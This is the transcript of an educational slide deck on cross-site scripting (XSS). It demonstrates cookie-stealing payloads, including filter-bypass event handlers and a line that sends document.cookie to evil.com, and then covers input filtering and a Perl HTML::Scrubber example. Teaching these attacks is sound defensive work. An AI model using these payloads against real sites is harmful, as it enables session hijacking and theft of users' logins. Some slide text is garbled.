cross site scripting augusta for matrix session
DESCRIPTION
this slide show tells about XSS attacks its various levels and ways to protect from themTRANSCRIPT
![Page 1: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/1.jpg)
By :
Augusta
http://www.steve.org.uk/Hacks/XSS/index.html
![Page 2: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/2.jpg)
XSS attacks /cross site scripting almost always focus upon sites which
use cookies for storing your username and password
Open Web Application Security Project's (OWASP) top 10 list of exploited vulnerabilities
![Page 3: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/3.jpg)
to steal the cookie of a user of the site Steal in this context means get a copy of,
rather than removing the original
<script> alert(document.cookie); </script>
<script> alert(document.cookie); </script>
submit
![Page 4: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/4.jpg)
Basic filtered input
<script and script> are filtered…. deleted
![Page 5: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/5.jpg)
They found some other way to avoid dependence on javascript tag
Other ways of calling Javascript <ahref="javascript:alert(document.c
ookie);">Click me</a> <a href="advanced.html"
onClick="alert(document.cookie)">test</a>
![Page 6: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/6.jpg)
I can run script, what now?
you don't want to have people viewing the popup boxes all day!
you want to do something more useful?
![Page 7: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/7.jpg)
redirect the user This would allow you to record the users
cookie for later (ab)use <script> document.location =
'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>
This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'.
The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'
![Page 8: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/8.jpg)
To next level
Using the onClick handler you have to rely upon the user clicking on a link you have placed
user will not click it, so what then?
![Page 9: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/9.jpg)
use another method onMouseOver
this allows you to have code executed when the mouse pointer merely moves over a link
![Page 10: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/10.jpg)
<a href="whatnow.html" onMouseOver="alert(document.cookie);">Test</a>
![Page 11: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/11.jpg)
best defense against XSS attacks??1. good filtering of input --If you allow users to send
messages to each other, for example, you really must filter all input from the sender to make sure it's secure
![Page 12: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/12.jpg)
Some sites will allow you to enter a URL, then they will display it as a clickable link such as:
<a href="URI">URI</a>
<a href="http://foocome" onMouseOver="alert(document.cookie)">http://foocome" onMouseOver="alert(document.cookie)</a>
![Page 13: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/13.jpg)
2. Use HTML scrubber- A good Perl module for filtering all input
read this:
http://search.cpan.org/~podmaster/HTML- Scrubber-0.08/Scrubber.pm
![Page 14: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/14.jpg)
Pearl code
#!/usr/bin/perl -w use HTML::Scrubber; use strict; # my $html = q[ <style type="text/css"> BAD { background: #666; color: #666;} </style> <script language="javascript"> alert("Hello, I am EVIL!"); </script> <HR> a => <a href=1>link </a> br => <br> b => <B> bold </B> u => <U> UNDERLINE </U> ]; # my $scrubber = HTML::Scrubber->new( allow => [ qw[ p b i u hr br ] ] ); # # print $scrubber->scrub($html); # # $scrubber->deny( qw[ p b i u hr br ] ); # # print $scrubber->scrub($html); # #
![Page 15: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/15.jpg)
I wasn't satisfied with HTML::Sanitizer because it is based on HTML::TreeBuilder, so I thought I'd write something similar that works directly with HTML::Parser
3. new W3C draft on mozilla firefox4. Ms patch :: crsscri
![Page 16: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/16.jpg)
Just another point of view!!! XSS is bad or good?? Who are you to decide?? What about mash ups 99acre and googlemap!!!
![Page 17: Cross Site Scripting Augusta For Matrix Session](https://reader033.vdocuments.mx/reader033/viewer/2022051816/5463dfcbaf795988338b46a6/html5/thumbnails/17.jpg)
Thank you so much. I am honored by your presence.